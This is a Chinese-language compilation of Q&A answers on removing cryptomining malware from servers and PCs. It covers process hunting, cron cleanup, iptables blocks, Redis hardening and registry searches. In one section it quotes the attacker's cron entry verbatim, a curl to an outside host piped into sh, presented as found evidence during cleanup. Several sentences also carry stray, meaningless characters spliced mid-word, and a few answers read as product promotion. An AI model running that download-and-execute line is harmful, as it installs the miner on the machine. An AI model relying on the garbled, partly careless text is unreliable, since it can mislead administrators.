伺服器中的挖礦軟體怎麼清除

1. miner挖礦木馬該怎麼清除

miner挖礦木馬這種病毒現在經常遇到，在一般情況下使用電腦管家的殺毒功能時無法查殺。

這時需要重啟電腦按F8進入電腦的安全模春遲姿式，在安全模式下，使用電腦旦嫌管家的病毒查殺，扒絕給電腦殺毒，在一般情況下的殺毒軟體可以查殺到此病毒。

miner挖礦木馬是消耗用戶的電腦資源，進行挖礦，導致用戶電腦資源和性能變低，一般看不出來，但是顯卡或CPU佔用很高，是電腦後台自行消耗顯卡與CPU資源的木馬病毒。現在十分常見。

2. 記一次清理伺服器挖礦程序注入kdevtmpfs

前幾天突然發現公司伺服器很卡，CPU經常飆到200%；網站服務被自動停止，甚至伺服器崩潰；於是進行排查，發現一個名為：kdevtmpfs的進程佔用了180%多的CPU，嚇了一跳，於是趕緊排查問題：首先查到這個進程並不少我們伺服器用到的進程，於是在網上查找這個問題，發現很多人都遇到過，於是根據網上的一個教程開始清理：

1、刪除掉/tmp文件下的kdevtmpfs文件；刪除掉kdevtmpfs對應的進程，清理掉定時任務；（無效，幾分鍾後依然會自動重啟，自動在定時任務新增定時任務）（ https://blog.csdn.net/qq503758762/article/details/103714342 ）

2、修改定時任務，不允許新增定時任務，復述1的步驟；（嘩枝無效，依然會自動重新啟動）；

3、經歷上述兩個方法都無效之後，做了以下操作：a、先用top命令查看進程號；b、根據systemctl status進程號命令，查看該進程對應的父進程；把對應進程下的程序都幹掉；重復幾次發現都是一個叫做kingsfdt的進程會和這個kdevtmpfs同時啟動；c、查看kingsfdt的進程，亂旅敏發現這也是一個陌生的進程，先不kill掉;d:查看系統防火牆，發現對應的23549埠不知道什麼時候開放的，並且對應的是kingsfdt這個進程，於是果斷把這個進程幹掉，同時把埠號封掉；e、再回頭刪除tmp下的kdevtmpfs文件，再依次刪除兩個陌生進程；f、登錄AWS控制台，把ssh埠改掉，22埠封掉；進入ssh修改root密碼，設定只鎮和能本地登錄；重啟伺服器；觀察了一天，發現服務穩定了，系統也正常運行了，CPU也正常了。開心。

3. windows伺服器的挖礦進程怎麼關閉刪除

這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後，使用裡面的病毒查殺功能，直接就可以查殺這種電腦病毒了

4. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

5. 我網上買了一個重裝系統U盤，重裝系統之後電腦里有一個惡意挖礦軟體，請問把這個卸載了就可以了嗎

直接卸載是不行的，建議「開始」-「運行」，輸入：regedit，打開windows注冊表，點擊上方：「編輯」-「查找」（不要勾選全字匹配，其他都勾上），輸入內容：lovecloud，然後將注冊表中所有與該內容有關的找出，全部刪掉。
你卸載掉該惡意軟體，同時在注冊表中搜不出任何與lovecloud有關的項，才能確定刪除干凈了。

6. 阿里雲windows伺服器如何去除挖礦病毒

找到進程，然後找到他文件路徑，幹掉進程，刪掉文件。
另外找找其他可疑進程，避免病毒有守護進程或者其他隱藏進程

7. 伺服器被檢測出挖礦

有位朋友說，他伺服器使用的好好的，服務商突然封了他伺服器，說是被檢測出挖礦，這位朋友一臉懵「我開游戲的，挖什麼礦」。突然地關停伺服器導致這位朋友損失慘重，那麼為什麼會被檢測出挖礦，以及怎麼處理呢？感興趣的話就繼續往下看吧~

遇到以上問題，需要先找伺服器商對其說明實際情況，配合他們排查，基本上就是中了挖礦病毒。

最簡單的方法就是重裝系統，但是系統盤數據都會清空，這種辦法適用於伺服器里沒什麼需要備份的文件。如果選擇重裝系統，需要把自己的文件掃毒一遍確認安全後再導入伺服器。

但是伺服器里如果有很多重要的文件還有比較難配置的環境，那就需要排查刪除挖礦程序，全盤掃毒，刪除可疑文件，一個個修復病毒對系統的修改。

防範建議：

1.盡量不要使用默認密碼和埠，改一個比較復雜的密碼

2.可以使用寶塔面板登陸伺服器

3.系統自帶的防火牆、安全防護都不要關閉

8. 可可軟體總是在後台運行挖礦病毒軟體怎麼清理

可可自動發軟體是個騙子，軟體都是病毒

9. mac中了挖礦木馬，該怎麼清除啊

卡巴斯基或者avast的Mac版下載下來全盤掃描，上面兩回復絕對是無腦推廣

10. 阿里雲windows伺服器中了挖礦的病毒怎麼清理

光刪除沒用的，因為沒有解決好漏洞。
建議是重做系統，然後找護衛神給你做一下系統安全加固，把漏洞徹底堵住才有效果。